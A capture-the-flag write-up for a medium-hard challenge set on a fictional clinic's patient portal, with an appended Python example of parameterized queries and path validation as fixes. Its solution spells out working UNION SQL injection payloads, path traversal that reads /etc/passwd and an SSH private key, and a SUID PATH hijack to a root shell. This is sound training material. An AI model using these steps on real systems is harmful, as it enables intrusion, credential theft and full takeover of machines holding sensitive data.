# Patient Portal

| Field | Value |
|-------|-------|
| Category | Misc |
| Difficulty | Medium-Hard |
| Points | 500 |
| Author | Eun0us |
| CTF | Espilon 2026 |

---

## Description

The WIRED-MED network at Clinique Sainte-Mika runs a patient portal for staff. Intelligence suggests the system was hastily deployed by contractor M. Eiri. Gain full control of the machine.

**Ports:**

- 8080: Web Portal (HTTP)
- 2222: SSH

Format: **ESPILON{flag}**

---

## TL;DR

SQL injection on the `/search` endpoint to dump credentials and the SSH passphrase. Log in as admin, exploit path traversal on the report download endpoint to steal the SSH private key. SSH in as `webadmin`. Find a SUID binary that calls `logger` with a relative path. Hijack it via PATH injection to spawn a root shell and read the flag.

---

## Tools

| Tool | Purpose |
|------|---------|
| Browser / `curl` | SQL injection, admin login, path traversal |
| `hashcat` / CrackStation | MD5 crack for admin password |
| `ssh` | Login as webadmin |
| `bash` | PATH injection privilege escalation |

---

## Solution

### Stage 1 — SQL Injection

The `/search?q=` endpoint is vulnerable to UNION-based injection with 6 columns.

**Enumerate columns:**

```
/search?q=' UNION SELECT 1,2,3,4,5,6--
```

**Discover tables:**

```
/search?q=' UNION SELECT 1,name,3,4,5,6 FROM sqlite_master WHERE type='table'--
```

Tables: `patients`, `users`, `system_config`

**Dump users:**

```
/search?q=' UNION SELECT 1,username,password_hash,role,5,6 FROM users--
```

Results:

- `admin` : MD5 hash `e0b7e413c064de43c6c1ca40a8c175a1`
- `nurse01` : (irrelevant)

**Dump system_config:**

```
/search?q=' UNION SELECT 1,key,value,3,4,5 FROM system_config--
```

Key finding: `ssh_passphrase = wired-med-013`

> 📸 `[screenshot: SQLi response showing the admin hash and ssh_passphrase rows]`

**Crack the admin password:**

```bash
echo -n "SainteMika2026" | md5sum
# e0b7e413c064de43c6c1ca40a8c175a1
```

Password: `SainteMika2026`

---

### Stage 2 — Admin Access

Log in at `/login`:

- Username: `admin`
- Password: `SainteMika2026`

The admin panel reveals: SSH port 2222, user `webadmin`.

> 📸 `[screenshot: admin panel after login showing report links and system info]`

---

### Stage 3 — Path Traversal

The `/admin/reports?file=` endpoint is vulnerable to path traversal.

**Confirm user exists:**

```
/admin/reports?file=../../../etc/passwd
```

**Extract the SSH private key:**

```
/admin/reports?file=../../../home/webadmin/.ssh/id_rsa
```

Save the key to `id_rsa` locally.

> 📸 `[screenshot: path traversal response returning the id_rsa private key]`

---

### Stage 4 — SSH Access

```bash
chmod 600 id_rsa
ssh -i id_rsa -p 2222 webadmin@<target>
# Passphrase: wired-med-013 (from system_config)
```

---

### Stage 5 — Privilege Escalation

**Find SUID binaries:**

```bash
find / -perm -4000 -type f 2>/dev/null
```

Found: `/opt/navi-monitor/vital-check` (SUID root)

**Inspect the binary:**

```bash
strings /opt/navi-monitor/vital-check | grep logger
```

The binary calls `system("logger -t vital-check 'check complete'")` using a **relative path** for `logger`.

> 📸 `[screenshot: strings output confirming the relative logger call]`

**Exploit via PATH hijacking:**

```bash
echo '#!/bin/bash' > /tmp/logger
echo '/bin/bash -p' >> /tmp/logger
chmod +x /tmp/logger
export PATH=/tmp:$PATH
/opt/navi-monitor/vital-check
```

`bash -p` preserves the SUID effective UID, spawning a root shell.

**Read the flag:**

```bash
cat /root/root.txt
```

> 📸 `[screenshot: root shell reading /root/root.txt with the flag]`

---

## Flag

`ESPILON{r00t_0f_s41nt3_m1k4}`
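The two web bugs used in Stage 1 and Stage 3 both come down to handing user input to the filesystem or the database unchanged. The example below is added here and is not the portal's code or part of the original write-up; the portal's source is not on the page, so the `patients(name, ward)` schema, the `/srv/portal/reports` directory and the function names are assumptions. It binds the search term as a query parameter, so the UNION payload is compared literally and cannot add columns or tables, and it resolves the requested report path and refuses anything that lands outside the reports directory.

```python
import sqlite3
from pathlib import Path

# Assumed location of the files served by /admin/reports?file=
REPORTS_DIR = Path("/srv/portal/reports")


def resolve_report_path(reports_dir, requested):
    """Return the absolute report path, or None if it escapes reports_dir.

    Joining and then resolving collapses ../ sequences, so a request for
    ../../../home/webadmin/.ssh/id_rsa ends up with parents that do not
    include reports_dir and is rejected. An absolute value such as
    /etc/passwd replaces the base on join and is rejected the same way.
    """
    base = Path(reports_dir).resolve()
    candidate = (base / requested).resolve()
    if base not in candidate.parents:
        return None
    return candidate


def search_patients(conn, q):
    """Run the /search lookup with a bound parameter, not string concatenation.

    The term is passed as data, so ' UNION SELECT ... FROM users-- is matched
    literally against the name column instead of being parsed as SQL.
    """
    cur = conn.execute(
        "SELECT name, ward FROM patients WHERE name LIKE ?",
        ("%" + q + "%",),
    )
    return cur.fetchall()


def demo_connection():
    """In-memory database with constructed sample rows (not challenge data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE patients (name TEXT, ward TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password_hash TEXT, role TEXT)")
    conn.executemany("INSERT INTO patients VALUES (?, ?)",
                     [("Alice Martin", "A1"), ("Bob Durand", "B2")])
    conn.execute("INSERT INTO users VALUES ('admin', 'not-a-real-hash', 'admin')")
    return conn


if __name__ == "__main__":
    db = demo_connection()
    print(search_patients(db, "Alice"))
    print(search_patients(db, "' UNION SELECT 1,username,password_hash,role,5,6 FROM users--"))
    print(resolve_report_path(REPORTS_DIR, "daily.txt"))
    print(resolve_report_path(REPORTS_DIR, "../../../home/webadmin/.ssh/id_rsa"))
```

The same prefix check applies to the `logger` lookup in Stage 5: calling the utility by absolute path, or with a fixed `PATH`, removes the attacker's control over which binary runs.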